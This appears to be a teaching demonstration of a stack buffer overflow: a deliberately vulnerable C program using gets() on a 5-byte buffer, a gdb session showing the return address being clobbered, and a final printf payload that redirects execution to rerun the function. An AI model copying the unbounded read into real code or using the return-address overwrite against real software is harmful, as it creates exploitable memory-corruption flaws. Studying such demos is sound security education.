#include <stdio.h>

/*
 * Reads one line from stdin into a 5-byte stack buffer and echoes it.
 *
 * Deliberately vulnerable: gets() takes no length, so any input longer than
 * 4 characters (plus the terminating NUL) writes past `array`.  In the
 * disassembly shown below the buffer lives at -0x5(%ebp), so the overflow
 * runs into the saved %ebp at 0(%ebp) and then the return address at
 * 4(%ebp); the stack dump taken after the "ABCDEDDDDDDDD" input shows
 * 0x44444444 in both slots, and the following `ret` faults at 0x44444444.
 * gets() was removed in C11; a bounded read such as
 * fgets(array, sizeof array, stdin) stops at the buffer end, and a stack
 * protector would detect the clobbered frame before `ret` consumes it.
 */
void return_input(void)
{
    char array[5];

    gets(array);                /* unbounded read: the overflow happens here */
    printf("%s\n", array);      /* lowered to puts() by the compiler (see `call <puts>`) */
}

/* Implicit-int main (pre-C99 style): calls the vulnerable function once. */
main()
{
    return_input();
    return 0;
}
>gdb -q overflow
(gdb) disas return_input
Dump of assembler code for function return_input:
0x0040138c <+0>: push %ebp
0x0040138d <+1>: mov %esp,%ebp
0x0040138f <+3>: sub $0xc,%esp
0x00401392 <+6>: lea -0x5(%ebp),%eax
0x00401395 <+9>: mov %eax,(%esp)
0x00401398 <+12>: call 0x401b1c <gets>
0x0040139d <+17>: lea -0x5(%ebp),%eax
0x004013a0 <+20>: mov %eax,(%esp)
0x004013a3 <+23>: call 0x401b14 <puts>
0x004013a8 <+28>: leave
0x004013a9 <+29>: ret
End of assembler dump.
(gdb) b *0x00401398 //0x00401398 <+12>: call 0x401b1c <gets>
Breakpoint 2 at 0x401398: file overflow.c, line 6.
(gdb) b *0x004013a3 //0x004013a3 <+23>: call 0x401b14 <puts>
Breakpoint 3 at 0x4013a3: file overflow.c, line 7.
(gdb) r
(gdb) disas main
Dump of assembler code for function main:
0x004013aa <+0>: push %ebp
0x004013ab <+1>: mov %esp,%ebp
0x004013ad <+3>: call 0x4018dc <__main>
0x004013b2 <+8>: call 0x40138c <return_input>
0x004013b7 <+13>: mov $0x0,%eax
0x004013bc <+18>: pop %ebp
0x004013bd <+19>: ret
End of assembler dump.
(gdb) x/20x $esp //0x004013b7 is the return address, $esp=0x28ff14, $ebp=0x0028ff28
0x28ff14: 0x0028ff1b 0x00000026 0x7efde000 0x0028ff28
0x28ff24: 0x004013b7 0x0028ff68 0x004010b9 0x00000001
0x28ff34: 0x005f2ba8 0x005f1978 0xffffffff 0x0028ff58
0x28ff44: 0x76c98cd5 0xf2b91182 0xfffffffe 0x76c8161e
0x28ff54: 0x76c815a0 0x00000000 0x005f1978 0x76c82811
(gdb) cont
Continuing.
ABCDEDDDDDDDD
(gdb) x/20x 0x28ff14
0x28ff14: 0x0028ff1b 0x41000026 0x45444342 0x44444444
0x28ff24: 0x44444444 0x0028ff00 0x004010b9 0x00000001
0x28ff34: 0x005f2ba8 0x005f1978 0xffffffff 0x0028ff58
0x28ff44: 0x76c98cd5 0xf2b91182 0xfffffffe 0x76c8161e
0x28ff54: 0x76c815a0 0x00000000 0x005f1978 0x76c82811
(gdb) step
Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? () //the return address was successfully overwritten
==== overwriting the return address ====
>printf "ABCDEDDDD\xb2\x13\x40\x00" | overflow //ret now returns to 0x004013b2 <+8>: call 0x40138c <return_input>, so return_input runs a second time (hence the doubled output below)
ABCDEDDDD?@
ABCDEDDDD?@